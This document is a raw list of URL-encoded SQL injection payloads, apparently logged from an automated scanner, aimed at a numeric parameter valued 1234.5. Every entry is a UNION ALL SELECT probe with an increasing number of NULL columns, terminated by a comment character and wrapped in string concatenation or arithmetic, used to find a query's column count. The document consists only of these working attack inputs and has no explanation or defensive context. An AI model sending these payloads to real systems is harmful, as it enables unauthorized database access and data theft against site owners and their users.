1234.5%27%20%7C%7C%20%28SELECT%208431%20FROM%20DUAL%20WHERE%205201%3D5201%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204931%20FROM%20DUAL%20WHERE%202949%3D2949%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208883%20FROM%20DUAL%20WHERE%202004%3D2004%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204605%20FROM%20DUAL%20WHERE%206674%3D6674%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203659%20FROM%20DUAL%20WHERE%201036%3D1036%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206817%20FROM%20DUAL%20WHERE%206879%3D6879%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201183%20FROM%20DUAL%20WHERE%207209%3D7209%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201804%20FROM%20DUAL%20WHERE%207879%3D7879%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208976%20FROM%20DUAL%20WHERE%206228%3D6228%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207514%20FROM%20DUAL%20WHERE%201554%3D1554%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209424%20WHERE%209533%3D9533%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207344%20WHERE%205315%3D5315%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204857%20WHERE%205275%3D5275%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208736%20WHERE%208637%3D8637%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207248%20WHERE%209662%3D9662%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203752%20WHERE%202075%3D2075%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209259%20WHERE%209911%3D9911%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204181%20WHERE%202780%3D2780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201552%20WHERE%205064%3D5064%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207229%20WHERE%207380%3D7380%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203665%20FROM%20DUAL%20WHERE%201676%3D1676%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209437%20FROM%20DUAL%20WHERE%205901%3D5901%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206829%20FROM%20DUAL%20WHERE%202726%3D2726%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202560%20FROM%20DUAL%20WHERE%206578%3D6578%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205956%20FROM%20DUAL%20WHERE%204750%3D4750%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%208143%20FROM%20DUAL%20WHERE%208605%3D8605%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204984%20FROM%20DUAL%20WHERE%203463%3D3463%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%202620%20FROM%20DUAL%20WHERE%208595%3D8595%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207621%20FROM%20DUAL%20WHERE%204249%3D4249%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205621%20FROM%20DUAL%20WHERE%209902%3D9902%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201960%20WHERE%207222%3D7222%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204855%20WHERE%209517%3D9517%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204119%20WHERE%209967%3D9967%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207065%20WHERE%209727%3D9727%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 